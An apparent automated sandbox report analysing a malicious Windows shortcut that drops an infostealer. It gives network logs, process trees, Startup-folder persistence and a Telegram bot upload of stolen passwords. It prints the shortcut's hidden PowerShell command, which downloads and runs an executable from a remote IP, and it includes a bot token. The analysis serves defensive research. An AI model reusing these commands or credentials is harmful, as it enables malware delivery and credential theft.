                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49758 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49936 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                Source: global trafficHTTP traffic detected: GET /panel/uploads/Cicycmiv.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: az-ka.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /panel/uploads/Cicycmiv.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: az-ka.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /chrome.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: az-ka.com
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7666772215:AAG3oWDDhgYedd4yOneZp0AStrhY_tgTlTc/sendDocument?chat_id=5830304904&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35d5d1e97e85Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E20B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.113.91
                Source: powershell.exe, 00000001.00000002.2132516862.000001A0DED50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2132842628.000001A0DF110000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmp, ORDER-202577008.lnkString found in binary or memory: http://87.120.113.91/chrome.exe
                Source: file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
                Source: TypeId.exe, 00000008.00000002.2578986604.0000000005BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E2730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0F12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E0D61000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E0D61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: file.exe, 00000006.00000002.4559068186.0000000002529000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/boti/sendDocument?chat_id=j&caption=napplication/x-ms-dos-executable
                Source: file.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://az-ka.com
                Source: file.exe, 00000003.00000000.2129826414.00000000006B2000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2281972613.0000000002931000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, file.exe.1.dr, TypeId.exe.3.drString found in binary or memory: https://az-ka.com/panel/uploads/Cicycmiv.mp3
                Source: powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E0F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E1992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000001.00000002.2133100290.000001A0E2730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0F12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2148952498.000001A0F0DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: file.exe, 00000006.00000002.4559068186.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.0000000002514000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002894000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                Source: file.exe, 00000003.00000002.2281972613.000000000297C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000008.00000002.2547706995.000000000241C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                Source: file.exe, 00000003.00000002.2301533818.0000000003989000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000002.2315784967.0000000006AC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownHTTPS traffic detected: 166.62.28.147:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 166.62.28.147:443 -> 192.168.2.5:49831 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49976 version: TLS 1.2

                System Summary

                barindex
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Windows shortcut file (LNK) contains suspicious command line arguments
                Source: ORDER-202577008.lnkLNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059DBDC8 NtResumeThread,3_2_059DBDC8
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059D8498 NtProtectVirtualMemory,3_2_059D8498
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059DBDC0 NtResumeThread,3_2_059DBDC0
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059D8490 NtProtectVirtualMemory,3_2_059D8490
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0280E7103_2_0280E710
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0280A7DE3_2_0280A7DE
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0280A7E83_2_0280A7E8
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_028004F83_2_028004F8
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0280AD703_2_0280AD70
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059D51903_2_059D5190
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059D75D83_2_059D75D8
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_059D51803_2_059D5180
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0719F6083_2_0719F608
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_071800073_2_07180007
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_071800403_2_07180040
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 3_2_0719DCC03_2_0719DCC0
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B43386_2_022B4338
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B38AE6_2_022B38AE
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022BCB286_2_022BCB28
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B40706_2_022B4070
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B40806_2_022B4080
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B47AF6_2_022B47AF
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B9F906_2_022B9F90
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_022B47C06_2_022B47C0
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9A5F06_2_05E9A5F0
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9ADC56_2_05E9ADC5
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9A5DF6_2_05E9A5DF
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9ACEA6_2_05E9ACEA
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9BCDB6_2_05E9BCDB
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AC4D6_2_05E9AC4D
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9A7DC6_2_05E9A7DC
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9A7366_2_05E9A736
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AF1D6_2_05E9AF1D
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AEC36_2_05E9AEC3
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AE846_2_05E9AE84
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AAE96_2_05E9AAE9
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AE036_2_05E9AE03
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9A9E36_2_05E9A9E3
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E940A06_2_05E940A0
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E940916_2_05E94091
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E900406_2_05E90040
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9001F6_2_05E9001F
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9ABB56_2_05E9ABB5
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AB656_2_05E9AB65
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9C2A76_2_05E9C2A7
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E992286_2_05E99228
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E992236_2_05E99223
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_05E9AA126_2_05E9AA12
                Source: C:\Users\user\AppData\Local\Temp\file.exeCode function: 6_2_067B32486_2_067B3248
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_00A7E7108_2_00A7E710
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_00A7A7E88_2_00A7A7E8
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_00A7AD708_2_00A7AD70
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_06A3F6088_2_06A3F608
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_06A3DCC08_2_06A3DCC0
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_06A200078_2_06A20007
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 8_2_06A200408_2_06A20040
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E9433810_2_00E94338
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E938AE10_2_00E938AE
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E9408010_2_00E94080
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E9407010_2_00E94070
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E9432910_2_00E94329
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E947C010_2_00E947C0
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E947AF10_2_00E947AF
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E9CB2810_2_00E9CB28
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E93FC810_2_00E93FC8
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_00E99F9010_2_00E99F90
                Source: C:\Users\user\AppData\Roaming\TypeId.exeCode function: 10_2_06C9364810_2_06C93648
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winLNK@11/8@5/6
                Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4vsq3ul.vkv.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: TypeId.exe, 0000000A.00000002.4579828279.000000000388D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORDER-202577008.lnkReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/chrome.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TypeId.exeProcess created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
